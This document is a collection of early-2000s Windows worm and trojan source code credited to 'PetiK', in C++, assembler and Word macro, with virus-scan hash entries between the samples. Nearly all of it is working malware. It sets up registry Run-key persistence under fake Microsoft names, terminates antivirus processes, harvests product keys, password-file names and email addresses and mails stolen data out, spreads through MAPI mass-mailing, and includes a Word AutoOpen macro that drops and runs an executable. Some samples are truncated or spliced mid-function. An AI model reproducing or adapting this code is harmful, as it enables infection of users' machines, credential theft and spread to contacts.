"Cannot Open files : It does not appear to be a valid Win32\n\nIf you downloaded the
file, try downloading again.",
"Error with Kernel32 :\nThis program will be terminated.",
"Loader Error :\nThis program will be terminated."
};
void Welcome();
void FuckAntivirus();
void htmfile();
void Spread();
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
GetModuleFileName(hInst,filename,100);
GetWindowsDirectory((char *)windir,100);
strcpy(windr,windir);
strcat(windir,"\\MSKERN32.EXE");
if ((lstrcmp(filename,windir))!=0) {
Welcome();
}
strcat(windr,"\\MSKern32.exe");
CopyFile(filename,windr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"MS Kernel32",0,REG_SZ, (BYTE *)windr, 100);
RegCloseKey(hReg);
FuckAntivirus();
GetSystemTime(&syst);
if(syst.wDay==1 && syst.wMonth==12) {
CreateDirectory("C:\\PetiK_Dir",0);
SetCurrentDirectory("C:\\PetiK_Dir");
htm = fopen("petikvx.htm","w");
fprintf(htm,"<html><head><title>The Last From PetiK</title></head>\n");
fprintf(htm,"<body bgcolor=\"blue\" text=\"yellow\">\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">Win32.HLLW.Last is in your
computer\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">This my last worm\n");
fprintf(htm,"<p align=\"center\"><font size=\"3\">Greetz to : all3gro, Benny, Bumblebee,
");
fprintf(htm,"Mandragore, ZeMacroKiller98, the 29A group and the [MATRiX] group.\n");
fprintf(htm,"<p align=\"center\"><font size=\"5\">GOOD BYE\n");
fprintf(htm,"</font></p>\n");
fprintf(htm,"</body></html>");
fclose(htm);
ShellExecute(0,"open","petikvx.htm",0,0,SW_SHOWNORMAL);
Sleep(3000);
MessageBox(NULL,"My last worm.\nCoded by PetiK (c)2001","W32.HLLW.Last", MB_OK|
MB_ICONINFORMATION);
}
htmfile();
Sleep(30000);
Spread();
return 0;
}
void Welcome()
{
MessageBeep(MB_ICONHAND);
MessageBox(NULL, text[GetTickCount()&3], filename, MB_OK|MB_ICONSTOP|MB_SYSTEMMODAL);
}
void FuckAntivirus()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void htmfile()
{
register bool abc=TRUE;
register HANDLE hFile;
register HWND verif;
RegOpenKeyEx(HKEY_USERS,Persona,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Personal",0,&type,done,&siz);
RegCloseKey(hReg);
SetCurrentDirectory(done);
hFile=FindFirstFile("*.ht*",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("HTM,HTML Files",ffile.cFileName,"Found by
W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
FindClose(hFile);
abc=TRUE;
hFile=FindFirstFile("*.doc",&ffile);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("DOC Files",ffile.cFileName,"Found by
W32.HLLW.Last","C:\\liste.txt");
abc=FindNextFile(hFile,&ffile);
}
}
SetFileAttributes("C:\\liste.txt",FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN);
}
void Spread()
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
count=(unsigned long)(syst.wMilliseconds*syst.wMinute);
while(count>5)
count=(unsigned long)(count/2);
strcpy(mname,mess->lpOriginator->lpszName);
strcpy(maddr,mess->lpOriginator->lpszAddress);
mess->ulReserved=0;
mess->lpszSubject=sujet[count];
mess->lpszNoteText=corps[count];
mess->lpszMessageType=NULL;
mess->lpszDateReceived=NULL;
mess->lpszConversationID=NULL;
mess->flFlags=MAPI_SENT;
mess->lpOriginator->ulReserved=0;
mess->lpOriginator->ulRecipClass=MAPI_ORIG;
mess->lpOriginator->lpszName=mess->lpRecips->lpszName;
mess->lpOriginator->lpszAddress=mess->lpRecips->lpszAddress;
mess->nRecipCount=1;
mess->lpRecips->ulReserved=0;
mess->lpRecips->ulRecipClass=MAPI_TO;
mess->lpRecips->lpszName=mname;
mess->lpRecips->lpszAddress=maddr;
mess->nFileCount=1;
mess->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
memset(mess->lpFiles, 0, sizeof(MapiFileDesc));
mess->lpFiles->ulReserved=0;
mess->lpFiles->flFlags=NULL;
mess->lpFiles->nPosition=-1;
mess->lpFiles->lpszPathName=filename;
mess->lpFiles->lpszFileName=attachfile[count];
mess->lpFiles->lpFileType=NULL;
mSendMail(session, NULL, mess, NULL, NULL);
count++;
}
}while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
free(mess->lpFiles);
mFreeBuffer(mess);
mLogoff(session,0,0,0);
FreeLibrary(hMAPI);
}
}
File Last.exe received on 05.16.2009 17:43:12 (CET)
Additional information
File size: 28672 bytes
MD5...: bfce6a179fa853c4c0a5bffc6b8c8f72
SHA1..: 6c8f1623c5471d556003928c15bf670175fc4d3d
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name : Trojan.PetiK
Author : PetiK
Language : C++/ASM
Début : 12 décembre 2001
Fin : 29 décembre 2001
*/
#include <windows.h>
#include <tlhelp32.h>
#include <mapi.h>
#pragma argused
#pragma inline
// Install Trojan
char filename[100], sysdir[100], sysdr[100], liste[50], pwl[50];
HKEY hReg;
LPSTR Run = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
// Fuck antivirus
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
// Prend des informations
BYTE owner[100],org[100],key[30],id[30],ver[30];
BYTE page[150];
DWORD sizowner=sizeof(owner),sizorg=sizeof(org),sizkey=sizeof(key),sizid=sizeof(id);
DWORD sizver=sizeof(ver),sizpage=sizeof(page),type=REG_SZ;
LPSTR
CurVer="Software\\Microsoft\\Windows\\CurrentVersion",Main="Software\\Microsoft\\Internet
Explorer\\Main";
// Envoie les infos
PROCESSENTRY32 uProcess;
WIN32_FIND_DATA Search;
void Bienvenue();
void StopDetect();
void Information();
void SendInfo();
int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
HMODULE k32=GetModuleHandle("KERNEL32.DLL");
if(k32) {
(FARPROC &)RegSerPro=GetProcAddress(k32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
}
// Install trojan
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdir,"\\SETUP02.EXE");
if ((lstrcmp(filename,sysdir))!=0) {
Bienvenue();
}
else
{
SendInfo();
}
strcat(sysdr,"\\Setup02.exe");
CopyFile(filename,sysdr,0);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft Setup",0,REG_SZ, (BYTE *)sysdr, 100);
RegCloseKey(hReg);
StopDetect();
Information();
void StopDetect()
{
register BOOL term;
lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
uProcess.dwSize=sizeof(uProcess);
rProcessFound=Process32First(lSnapshot,&uProcess);
while(rProcessFound) {
if(strstr(uProcess.szExeFile,"NAVAPW32.EXE")!=NULL) { // Norton Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
if(strstr(uProcess.szExeFile,"PAVSCHED.EXE")!=NULL) { // Panda Antivirus
myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
if(myproc!=NULL) {
term=TerminateProcess(myproc,0);
}
CloseHandle(myproc);
}
rProcessFound=Process32Next(lSnapshot,&uProcess);
}
CloseHandle(lSnapshot);
}
void Information()
{
register bool abc=TRUE;
register HANDLE hFile;
GetSystemDirectory((char *)liste,50);
strcat(liste,"\\liste_troj.txt");
RegOpenKeyEx(HKEY_LOCAL_MACHINE,CurVer,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"RegisteredOwner",0,&type,owner,&sizowner);
RegQueryValueEx(hReg,"RegisteredOrganization",0,&type,org,&sizorg);
RegQueryValueEx(hReg,"ProductKey",0,&type,key,&sizkey);
RegQueryValueEx(hReg,"ProductId",0,&type,id,&sizid);
RegQueryValueEx(hReg,"Version",0,&type,ver,&sizver);
RegCloseKey(hReg);
RegOpenKeyEx(HKEY_CURRENT_USER,Main,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Start Page",0,&type,page,&sizpage);
RegCloseKey(hReg);
WritePrivateProfileString("Info Ordi","Owner",owner,liste);
WritePrivateProfileString("Info Ordi","Organization",org,liste);
WritePrivateProfileString("Info Ordi","ProductKey",key,liste);
WritePrivateProfileString("Info Ordi","ProductId",id,liste);
WritePrivateProfileString("Info Ordi","Version",ver,liste);
WritePrivateProfileString("Info Internet","Page Internet",page,liste);
GetWindowsDirectory((char *)pwl,50);
SetCurrentDirectory(pwl);
hFile=FindFirstFile("*.pwl",&Search);
if(hFile!=INVALID_HANDLE_VALUE) {
while(abc) {
WritePrivateProfileString("Info Pass",Search.cFileName,pwl,liste);
abc=FindNextFile(hFile,&Search);
}
}
FindClose(hFile);
}
void SendInfo()
{
_asm
{
DebutAsm:
push 50
push offset liste
call GetSystemDirectoryA
call @liste
db "\liste_troj.txt",0
@liste: push offset liste
call lstrcat
call @wininetdll
db "WININET.DLL",0
@wininetdll:
call LoadLibrary
test eax,eax
jz send
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz End
mov edi,eax
verif: push 00h
push offset Tmp
call edi
dec eax
jnz verif
push ebp
call FreeLibrary
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MsgHdl]
call edi
push 5000
call Sleep
push ebp
call FreeLibrary
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset petikmail
dd offset petikmail
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset liste
dd ?
dd ?
FinAsm:
}
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_ALL_ACCESS,&hReg);
RegDeleteValue(hReg,"Microsoft Setup");
RegCloseKey(hReg);
}
void Bienvenue()
{
MessageBox(NULL,"Je te souhaite une Bonne et Heureuse Nouvelle Année.\nEt tous mes
meilleurs voeux.",
"BONNE ANNEE !",MB_OK|MB_ICONINFORMATION);
}
File Trojan_PetiK.exe received on 05.16.2009 20:10:19 (CET)
Additional information
File size: 24064 bytes
MD5...: c12a8711efbf38f0820c827f22269684
SHA1..: 2afd3a9fb4ae7af97c9618b98b87b28894fec2d2
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
/*
Name : I-Worm.SingLung
Author : PetiK
Date : January 23rd 2002
Language : C++/Win32asm
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],sysdr[100],winhtm[100];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run",
SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell
Folders";
int i;
HANDLE fd,lSnapshot,myproc;
BOOL rProcessFound;
FILE *vbs;
BYTE desktop[50],favoris[50],personal[50],cache[50];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache);
DWORD type=REG_SZ;
FILE *stopv;
LHANDLE session;
MapiMessage mess;
MapiRecipDesc from;
HINSTANCE hMAPI;
HKEY hReg;
PROCESSENTRY32 uProcess;
SYSTEMTIME systime;
WIN32_FIND_DATA ffile;
HDC dc;
void Welcome();
void StopAV(char *);
void FindFile(char *,char *);
void GetMail(char *,char *);
void sendmail(char *);
void FeedBack();
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
/*
// Worm in RegisterServiceProcess
HMODULE kern32=GetModuleHandle("KERNEL32.DLL");
if(kern32) {
(FARPROC &)RegSerPro=GetProcAddress(kern32,"RegisterServiceProcess");
if(RegSerPro)
RegSerPro(NULL,1);
} */
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSGDI32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
}
else
{
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(winhtm,".ht*");
FindFile(cache,".ht*");
FreeLibrary(hMAPI);
FeedBack();
}
strcat(sysdir,"\\MsGDI32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft GDI 32 bits",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
}
void Welcome()
{
register char fileWel[100],messWel[25],titWel[25];
strcpy(fileWel,filename);
fileWel[0]=0;
for(i=strlen(filename);i>0 && filename[i]!='\\';i--);
wsprintf(titWel,"Error - %s",fileWel+i+1);
wsprintf(messWel,"File - %s - damaged.\nCannot open this file.",fileWel+i+1);
MessageBox(NULL,messWel,titWel,MB_OK|MB_ICONHAND);
}
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIV
E,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
from.lpszName=NULL;
from.ulRecipClass=MAPI_ORIG;
mess.lpszSubject="Secret for you...";
mess.lpszNoteText="Hi Friend,\n\n"
"I send you my last work.\n"
"Mail me if you have some suggests.\n\n"
" See you soon. Best Regards.";
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="My_Work.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
void FeedBack()
{
GetSystemTime(&systime);
switch(systime.wDay) {
case 7:
MessageBox(NULL,"It is not with a B-52 that you will stop terrorist groups.\n"
"With this, you stop the life of women and children.",
"Message to USA",MB_OK|MB_ICONHAND);
break;
case 11:
dc=GetDC(NULL);
if(dc)
{
TextOut(dc,300,300,"Can we try to stop the conflicts ? YES OF COURSE !",50);
}
ReleaseDC(NULL,dc);
break;
case 28:
stopv=fopen("StopIntifada.htm","w");
fprintf(stopv,"<html><head><title>Stop Violence between Palestinians and
Israeli</title></head>\n");
fprintf(stopv,"<body bgcolor=blue text=yellow>\n");
fprintf(stopv,"<p align=\"center\"><font size=\"5\">HOW TO STOP THE
VIOLENCE</font></p><BR>\n");
fprintf(stopv,"<p align=\"left\"><font size=\"3\">-THE ISRAELIS:</font><BR>\n");
fprintf(stopv,"<font>To take the israelis tank out of the palestinians autonomous
city.</font><BR>\n");
fprintf(stopv,"<font>Don't bomb civil place after a terrorist bomb
attack.</font><BR>\n");
fprintf(stopv,"<font>To arrest and to kill the leaders of terrorist
groups.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE PALESTINIANS:</font><BR>\n");
fprintf(stopv,"<font>To stop to provoke the israelis army.</font><BR>\n");
fprintf(stopv,"<font>To stop the terrorist attacks.</font><BR><BR>\n");
fprintf(stopv,"<font>-THE BOTH:</font><BR>\n");
fprintf(stopv,"<font>To try to accept the other people.</font><BR>\n");
fprintf(stopv,"<font>TO ORGANIZE A MEETING BETWEEN ARIEL SHARON AND YASSER ARAFAT !
</font><BR><BR>\n");
fprintf(stopv,"<font>Thanx to read this.</font></p>\n");
fprintf(stopv,"</body></html>");
fclose(stopv);
ShellExecute(NULL,"open","StopIntifada.htm",NULL,NULL,SW_SHOWMAXIMIZED);
break;
}
}
File SingLung.exe received on 05.16.2009 19:40:32 (CET)
Additional information
File size: 29184 bytes
MD5...: 460f48b7d7bde2517c1a9a9042682f28
SHA1..: f6ced460439e443aa957c2765328f3b99dcdd252
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
' Name : W97M-W32.Twin
' Author : PetiK
' Language : VBA Word & Assembler
' Date : 01/02/2002
' Size : 2701 byte
Attribute VBA_ModuleType=VBAModule
Sub twin
Sub AutoOpen()
win = Environ("windir")
thisfile = ActiveDocument.Name
full = ActiveDocument.FullName
e = "exe="""
e = e + "4D5A50000200000..."
e = e + "000...000000000000"
e = e + "0000000000"
e = e + """"
f = "fso.CopyFile """
f = f + full
f = f + """, win&""\NetInfo.doc"""
Open "C:\Twin.vbs" For Output As #1
Print #1, "On Error Resume Next"
Print #1, "Set fso=CreateObject(""Scripting.FileSystemObject"")"
Print #1, "Set w=CreateObject(""WScript.Shell"")"
Print #1, "Set win=fso.GetSpecialFolder(0)"
Print #1, "Set Twin=CreateObject(""Outlook.Application"")"
Print #1, "Set deux=Twin.GetNameSpace(""MAPI"")"
Print #1, "Set c=fso.CreateTextFile(""C:\backup.win"")"
Print #1, "c.Close"
Print #1, "For Each polux In deux.AddressLists"
Print #1, "If polux.AddressEntries.Count <> 0 Then"
Print #1, "For jumeaux = 1 To polux.AddressEntries.Count"
Print #1, "Set castor = polux.AddressEntries(jumeaux)"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine castor.Address"
Print #1, "c.Close"
Print #1, "Next"
Print #1, "End If"
Print #1, "Next"
Print #1, "Set c=fso.OpenTextFile(""C:\backup.win"",8,true)"
Print #1, "c.WriteLine ""#"""
Print #1, "c.Close"
Print #1, ""
Print #1, e
Print #1, "lire=decr(exe)"
Print #1, "Set exfile=fso.CreateTextFile(win&""\AVW32.exe"",true)"
Print #1, "exfile.Write lire"
Print #1, "exfile.Close"
Print #1, f
Print #1, "w.Run win&""\AVW32.exe"", 1, False"
Print #1, "Function decr(octet)"
Print #1, "For hexa = 1 To Len(octet) Step 2"
Print #1, "decr = decr & Chr(""&h"" & Mid(octet, hexa, 2))"
Print #1, "Next"
Print #1, "End Function"
Close #1
Shell "wscript C:\Twin.vbs", vbHide
End Sub
Sub HelpAbout()
With Application.Assistant
.Visible = True
End With
With Assistant.NewBalloon
.Text = "Message for " & Application.UserName & vbCrLf & "How Are You"
.Heading = "W97M/W32ASM.Twin.Worm"
.Animation = msoAnimationSendingMail
.Button = msoButtonSetOK
.Show
End With
End Sub
End Sub
comment #
Name : I-Worm.Twin
Author : PetiK
Date : January 30th 2002 - February 1st 2002
Size : 6656 bytes
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start: push 50
mov esi,offset orig_worm
push esi
push 0
api GetModuleFileNameA
push 25
push esi
push 1
@pushsz "AntiVirus Freeware"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
api SHSetValueA
@pushsz "C:\twin.vbs"
api DeleteFileA
push 50
push offset pathname
api GetWindowsDirectoryA
@pushsz "\NetInfo.doc"
push offset pathname
api lstrcat
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 0
push 0
push 3
push 0
push 1
push 80000000h
@pushsz "C:\backup.win"
api CreateFileA
inc eax
je end_worm
dec eax
xchg ebx,eax
push 0
push 0
push 0
push 2
push 0
push ebx
api CreateFileMappingA
test eax,eax
je end_w1
xchg eax,ebp
push 0
push 0
push 0
push 4
push ebp
api MapViewOfFile
test eax,eax
je end_w2
xchg eax,esi
push 0
push ebx
api GetFileSize
cmp eax,3
jbe end_w3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
entr2: xor al,al
stosb
pop edi
jmp scan_mail
f_mail:
end_worm:
push 0
api ExitProcess
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
.data
orig_worm db 50 dup (0)
pathname db 50 dup (0)
mail_addr db 128 dup (?)
inet dd 0
sess dd 0
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset pathname
dd offset filename
dd ?
end start
end
Additional information
File size: 6656 bytes
MD5...: 3da254ab9def856d64f0779ea6a6057f
SHA1..: 31a005985a793d2b8e84dd747c3fa17c721ddf60
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
File Twin.doc received on 05.16.2009 19:41:06 (CET)
Additional information
File size: 65536 bytes
MD5...: 079275bdaf0058642f3b062b3aef4de3
SHA1..: 0fe4a31077176828ec545b7ca3c5e92ea59a7352
SHA256: 46a11a3b520a234a4408010d57a0bd28589526f3248e16fc71ccf4cf8db31595
/*
Name : I-Worm.Essence
Author : PetiK
Date : February 3rd 2002
Language : C++
Thanx to Bumblebee.
*/
#include <windows.h>
#include <mapi.h>
#include <memory.h>
#pragma argused
void Welcome();
void attachname();
void sendmail(LHANDLE sess, char *msubject, char *mbody, char *mailaddr);
char filename[100],sysdir[100],sysdr[100],attname[20];
LPSTR Run="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
HINSTANCE hMAPI;
LHANDLE sess;
MapiMessage *mess;
char messId[512];
char subject[1024],
address[1024],
server[1024],
body[8192];
long i,j;
char *tmp;
MSG msg;
HKEY hReg;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
strcpy(sysdr,sysdir);
strcat(sysdr,"\\MSIE32.EXE");
if((lstrcmp(filename,sysdr))!=0) {
Welcome();
strcat(sysdir,"\\Msie32.exe");
CopyFile(filename,sysdir,FALSE);
RegOpenKeyEx(HKEY_LOCAL_MACHINE,Run,0,KEY_WRITE,&hReg);
RegSetValueEx(hReg,"Microsoft IE",0,REG_SZ,(BYTE *)sysdir,100);
RegCloseKey(hReg);
// WriteProfileString("WINDOWS","RUN",sysdir);
// WriteProfileString(NULL,NULL,NULL);
return 0;
}
hMAPI=LoadLibrary("MAPI32.DLL");
if(!hMAPI)
return -1;
(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
if(!mLogon)
return -1;
(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
if(!mLogoff)
return -1;
(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
if(!mFindNext)
return -1;
(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
if(!mReadMail)
return -1;
(FARPROC &)mSaveMail=GetProcAddress(hMAPI, "MAPISaveMail");
if(!mSaveMail)
return -1;
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
if(!mSendMail)
return -1;
(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
if(!mFreeBuffer)
return -1;
mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&sess);
SetThreadPriority(NULL,THREAD_PRIORITY_LOWEST);
while(GetMessage(&msg,NULL,0,0))
if(mFindNext(sess,0,NULL,NULL,MAPI_LONG_MSGID|
MAPI_UNREAD_ONLY,NULL,messId)==SUCCESS_SUCCESS) {
do {
if(mReadMail(sess,NULL,messId,MAPI_ENVELOPE_ONLY|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
if(lstrlen(mess->lpszSubject)>2)
if(mess->lpszSubject[strlen(mess->lpszSubject)-1]!=' ' && mess-
>lpszSubject[strlen(mess->lpszSubject)-2]!=' ') {
mFreeBuffer(mess);
SetThreadPriority(NULL,THREAD_PRIORITY_HIGHEST);
if(mReadMail(sess,NULL,messId,MAPI_SUPPRESS_ATTACH|
MAPI_PEEK,NULL,&mess)==SUCCESS_SUCCESS) {
body[0]=0;
if(mess->lpszNoteText) {
wsprintf(body,"Hi '%s', you wrote me :\n##########\n- ",mess-
>lpOriginator->lpszName);
for(i=0,j=lstrlen(body);i<lstrlen(mess->lpszNoteText) && j<512;i++,j++) {
body[j]=mess->lpszNoteText[i];
if(body[j]=='\n') {
body[j]=0;
lstrcat(body,"\n- ");
j+=2;
}
}
body[j]=0;
}
for(i=0;j<lstrlen(address) && address[i]!='@';i++);
if(i>lstrlen(address))
wsprintf(body,"smtp.%s",address+i+1);
else
wsprintf(body,"smtp.yahoo.com");
if(j>=512)
lstrcat(body,"...");
else
lstrcat(body," ");
wsprintf(body+strlen(body),"\n##########\n\n %s auto-reply:\n\n",server);
lstrcat(body,"I can not reply now.\nLook at this attachment and mail me if
you have some suggests.\n\n");
wsprintf(subject,"Re: %s ",mess->lpszSubject);
wsprintf(address,"%s",mess->lpOriginator->lpszAddress);
MessageBox(NULL,body,subject,MB_OK|MB_ICONINFORMATION);
sendmail(sess,subject,body,address);
tmp=(char *)malloc(strlen(mess->lpszSubject)+3);
strcpy(tmp,mess->lpszSubject);
free(mess->lpszSubject);
tmp[strlen(tmp)+2]=0;
tmp[strlen(tmp)]=' ';
